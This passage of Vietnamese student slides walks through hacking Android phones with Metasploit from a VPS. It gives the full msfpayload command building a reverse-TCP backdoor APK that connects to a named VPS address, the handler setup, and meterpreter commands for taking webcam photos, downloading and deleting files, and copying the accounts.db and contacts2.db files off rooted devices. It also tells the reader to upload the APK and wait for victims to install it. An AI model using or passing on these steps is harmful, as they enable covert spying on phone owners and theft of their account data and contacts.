để thực hiện những nhu cầu riêng như truy cập Web bằng trình duyệt Web trên VPS, download/upload bittorent với tốc độ cao... Trong trường hợp VPS bị thiếu tài nguyên có thể dễ dàng nâng cấp thêm tài nguyên mà không phải khởi động lại hệ thống. Có thể cài lại hệ điều hành vời thời gian từ 5-10 phút
  • 4. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6 4 3. Hack android sử dụng metaspoit cài trên VPS Trước tiên ta mở Terminal trong Kali Linux lên và gõ lệnh để tạo một backdoor: msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.184 lport=4444 R> /root/Desktop/app.apk Trong đó 14.0.21.184 là địa chỉ máy VPS của ta. /root/Desktop/app.apk là đường dẫn chứa file vừa tạo. Sauk hi tạo một backdoor được tạo, ta tải nó lên mạng. Chờ máy android down về cài đặt và truy cập vào thì sẽ hiện lên như bên dưới:
  • 5. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6 5 Ta vào máy VPS và mở Metasploit Console lên Sau đó ta sẽ đánh các lệnh như bên dưới để tạo một liên kết với máy android mà ta sẽ hack: use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 14.0.21.184 set lport 4444 run Chú ý: lhost và lport phải giống với lhost và lport khi tạo backdoor
  • 6. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6 6 Khi máy android nhấp vào biểu tượng có chữ ReverseTCP thì sẽ có thông báo là đã kết nối Ta gõ lệnh help để hiện lên các lệnh mà ta có thể sử dụng để hack android
  • 7. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6 7 Ta dùng lệnh sysinfo để xem thông tin máy android Ta dùng lênh webcam_list để xem danh sách các camera Ta dùng lệnh webcam_snap x để chụp một bức ảnh từ camera của máy android. Trong đó: x là 1: Back Camera 2: Front Camera
  • 8. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6 8 Để di chuyển đến thư mục nào ta dụng lệnh cd <đường dẫn đến thư mục> Lệnh ls để xem trong thư mục có những gì Ta vào thư mục /sdcard/Download để down file về Ta dùng lệnh download <tên file> để down file đó về máy VPS của ta
  • 9. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6 9 Muốn xóa một file ta dùng lệnh rm <tên file> Để đánh cắp tài khoản trước tiên ta phải vào hệ thống của máy android. Lưu ý: máy android này phải được root trước đó. Ta dùng lênh shell để vào hệ thống Dùng lệnh su để toàn quyền truy cập Dùng lệnh whoami để biết máy android đã được root chưa. Nếu rồi thì nó sẽ hiện thông báo là unknown uid 0
  • 10. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6 10 Ta gõ cd /data/system để vào thư mục system Tiếp theo gõ ls –l để xem trong thư mục có gì Ta gõ lệnh cp accounts.db /sdcard để copy file accounts.db về Sdcard
  • 11. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6 11 Sau đó ta trở về meterpreter bằng lệnh exit rồi dùng lệnh download file accounts.db về máy VPS của chúng ta Tiếp tục ta vào địa chỉ /data/data/com.android.providers.contacts/databases để copy file contacts2.db về Sdcard
  • 12. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6 12 Sau đó ta download file contacts2.db về máy VPS Bên dưới là danh sách danh bạ ta down từ máy android đã được root. Ta mở file *.db bằng phần mềm SQLite. Ta có thể down phần mềm đó về vài cài vào VPS của chúng ta Hết
  • 13. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6 13